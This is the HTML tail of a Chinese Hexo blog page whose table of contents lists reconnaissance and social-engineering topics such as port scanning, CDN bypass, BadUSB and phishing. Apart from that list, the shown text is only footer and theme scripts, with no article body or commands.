href="#%E4%BD%BF%E7%94%A8google%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E"><span class="nav-text">使用google搜索引擎</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E2%BD%B9%E7%BB%9C%E7%A9%BA%E9%97%B4%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E"><span class="nav-text">⽹络空间搜索引擎</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90%E6%9F%A5%E8%AF%A2"><span class="nav-text">域名解析查询</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%A8%E5%86%8C%E4%BF%A1%E6%81%AF%E6%9F%A5%E8%AF%A2"><span class="nav-text">注册信息查询</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%9F%E5%90%8D%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-text">域名信息收集</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%BB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-text">主动信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%BB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E9%A1%BB%E7%9F%A5"><span class="nav-text">主动信息收集须知</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%85%B3%E4%BA%8ECDN%E7%9A%84%E8%AF%86%E5%88%AB%E4%B8%8E%E7%BB%95%E8%BF%87"><span class="nav-text">关于CDN的识别与绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#CDN%E8%AF%86%E5%88%AB"><span class="nav-text">CDN识别</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CDN%E7%BB%95%E8%BF%87"><span class="nav-text">CDN绕过</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%BB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E7%9A%84%E6%96%B9%E5%BC%8F"><span class="nav-text">主动信息收集的方式</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%BB%E5%9F%9F%E5%90%8D%E6%94%B6%E9%9B%86"><span class="nav-text">主域名收集</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AD%90%E5%9F%9F%E5%90%8D%E6%94%B6%E9%9B%86"><span class="nav-text">子域名收集</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="nav-text">目录扫描</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="nav-text">端口扫描</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8C%87%E7%BA%B9%E8%AF%86%E5%88%AB"><span class="nav-text">指纹识别</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F"><span class="nav-text">漏洞扫描</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#WAF%E8%AF%86%E5%88%AB"><span class="nav-text">WAF识别</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%A4%BE%E4%BC%9A%E5%B7%A5%E7%A8%8B%E5%AD%A6"><span class="nav-text">社会工程学</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%95%8F%E6%84%9F%E6%95%B0%E6%8D%AE%E6%94%B6%E9%9B%86"><span class="nav-text">敏感数据收集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Badusb"><span class="nav-text">Badusb</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B0%B4%E5%9D%91%E6%94%BB%E5%87%BB"><span class="nav-text">水坑攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%92%93%E9%B1%BC%E6%94%BB%E5%87%BB"><span class="nav-text">钓鱼攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%92%93%E9%B1%BC%E7%BD%91%E7%AB%99"><span class="nav-text">钓鱼网站</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%82%AE%E4%BB%B6%E9%92%93%E9%B1%BC"><span class="nav-text">邮件钓鱼</span></a></li></ol></li></ol></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
            <div class="customize-info my-1">关山初度尘未洗，策马扬鞭再奋蹄。</div>
        
        <div class="text-center">
            &copy;
            
              <span>2023</span>
              -
            
            2024&nbsp;&nbsp;<i class="fa-solid fa-circle-info fa-beat-fade" style="--fa-beat-fade-opacity: 0.67; --fa-beat-fade-scale: 1.075;" ></i>&nbsp;&nbsp;<a href="/">韩乔落</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        34 posts in total
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                
            </div>
        
        <!-- <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.6.1</a></span>
        </div> -->
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fa-solid fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="Search..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fa-solid fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>


    <script src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/libs/Swup.min.js"></script><script src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/libs/SwupSlideTheme.min.js"></script><script src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/libs/SwupScriptsPlugin.min.js"></script><script src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/libs/SwupProgressPlugin.min.js"></script><script src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/libs/SwupScrollPlugin.min.js"></script><script src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/libs/SwupPreloadPlugin.min.js"></script>
<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>






<script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/tools/imageViewer.js"></script><script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/utils.js"></script><script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/main.js"></script><script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/layouts/navbarShrink.js"></script><script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/tools/scrollTopBottom.js"></script><script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/tools/lightDarkSwitch.js"></script><script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/layouts/categoryList.js"></script>


    <script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/tools/localSearch.js"></script>



    <script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/tools/codeBlock.js"></script>



    <script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/layouts/lazyload.js"></script>



    <script src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/tools/runtime.js"></script>
    <script src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/libs/odometer.min.js"></script>
    <link rel="stylesheet" href="//evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/assets/odometer-theme-minimal.css">



  <script src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/libs/Typed.min.js"></script>
  <script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/plugins/typed.js"></script>








<div class="post-scripts" data-swup-reload-script>
    
        <script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/tools/tocToggle.js"></script><script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/layouts/toc.js"></script><script type="module" src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/plugins/tabs.js"></script>
    
</div>


</body>
</html>
